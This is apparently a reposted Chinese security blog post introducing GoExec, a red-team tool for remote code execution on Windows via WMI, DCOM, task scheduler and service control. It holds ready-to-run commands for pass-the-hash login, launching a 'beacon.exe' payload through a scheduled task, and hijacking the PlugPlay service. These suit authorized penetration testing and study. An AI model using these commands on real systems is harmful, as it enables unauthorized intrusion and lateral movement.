文章总结: GoExec是一款Go语言编写的Windows远程执行多合一工具,支持WMI、DCOM、SCMR和TSCH协议。该工具提供多种认证方式如NT哈希和Kerberos,具备输出捕获与代理支持功能,显著提升了操作安全性。文章详细介绍了各模块功能与使用示例,并指出需注意OPSEC风险及权限要求,适用于授权的安全研究与红队演练。 综合评分: 84 文章分类: 安全工具,红队,内网渗透
红队福音:GoExec实现多种Windows远程代码执行方法
柠檬赏金猎人
2026年3月6日 08:17 广东
概述
GoExec是一款用Go语言编写的Windows远程执行多合一工具,它实现了多种远程执行方法,并对操作安全性(OPSEC)进行了显著改进。该工具支持WMI、DCOM、SCMR和TSCH等多种协议,为安全研究人员和红队人员提供了灵活且隐蔽的远程代码执行能力。
技术/功能
GoExec的核心功能模块如下:
| 模块名称 | 主要功能 | 关键特性 | | — | — | — | | WMI模块 | 通过Windows管理规范远程执行 | 支持进程创建和自定义方法调用 | | DCOM模块 | 利用分布式组件对象模型执行 | 支持MMC、ShellWindows、Excel等多种对象 | | TSCH模块 | 通过任务计划程序服务执行 | 支持创建、修改和即时启动任务 | | SCMR模块 | 通过服务控制管理器执行 | 支持创建、修改和删除服务 |
主要特性:
- 支持多种认证方式:密码、NT哈希、Kerberos、证书等
- 可选的执行输出捕获功能(通过SMB传输)
- 支持代理和自定义RPC端点
- 提供详细的调试和日志记录选项
使用示例
1. 使用WMI模块执行命令
# 使用NT哈希认证,执行whoami命令并获取输出
goexec wmi proc "192.168.1.100" \
-u "administrator@domain" \
-H "aad3b435b51404eeaad3b435b51404ee" \
-e "cmd.exe" \
-a "/C whoami /all" \
-o-
2. 使用DCOM的MMC方法
# 执行系统命令并保存输出到文件
goexec dcom mmc "target-host" \
-u "admin" \
-p "Password123" \
-e "cmd.exe" \
-a "/c systeminfo" \
-o ./systeminfo.txt
3. 使用任务计划程序模块
# 创建定时任务执行程序
goexec tsch create "192.168.1.50" \
-u "user@domain" \
-p "password" \
--kerberos \
--task "\\Microsoft\\Windows\\GoExec" \
--exec "C:\\Windows\\Temp\\beacon.exe"
4. 修改现有服务执行命令
# 修改PlugPlay服务执行自定义命令
goexec scmr change "target" \
-u "administrator" \
-p "AdminPass123" \
-s "PlugPlay" \
-f "C:\\Windows\\System32\\cmd.exe" \
-a "/c echo Hello > C:\\test.txt"
注意事项
- 合法使用:仅限授权测试和合法安全研究使用
- OPSEC考虑:输出捕获功能会在目标系统创建临时文件,可能被安全软件检测
- DCOM限制:DCOM模块在某些Windows版本上可能不稳定,且不支持Kerberos认证
- 服务修改风险:修改关键Windows服务可能导致系统不稳定
- 时间同步:TSCH模块需要目标系统时间同步准确
- 权限要求:大多数方法需要管理员权限才能成功执行
参考链接
- https://github.com/FalconOpsLLC/goexec
- https://www.falconops.com/blog/introducing-goexec
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/
仅限交流学习使用,如您在使用本工具或代码的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。如侵权请私聊公众号删文。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:柠檬赏金猎人 《红队福音:GoExec实现多种Windows远程代码执行方法》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论